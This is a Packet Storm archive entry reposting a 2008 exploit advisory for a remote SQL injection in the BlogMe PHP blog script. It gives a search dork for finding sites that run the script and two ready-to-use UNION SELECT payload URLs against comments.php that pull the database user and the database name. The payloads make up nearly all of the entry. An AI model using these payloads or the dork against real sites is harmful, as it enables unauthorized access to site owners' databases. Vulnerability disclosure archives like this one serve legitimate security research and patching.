blogmephp-sql.txt

2008-05-05T00:00:00
ID PACKETSTORM:65999
Type packetstorm
Reporter His0k4
Modified 2008-05-05T00:00:00

Description

                                        
                                            `###########################################  
{+} BlogMe PHP remote SQL injection exploit  
{+} Script download : http://www.drumster.net/gamma/downloads/BlogMe11.zip  
{+} Founded by : His0k4 [ ALGERIAN HaCkEr ]  
{+} Greetz : All friends & muslims HaCkeRs...  
{+} Dork : "BlogMe PHP created by Gamma Scripts"  
###########################################  
{+} Exploit :  
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--  
OR :  
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--  
###########################################  
`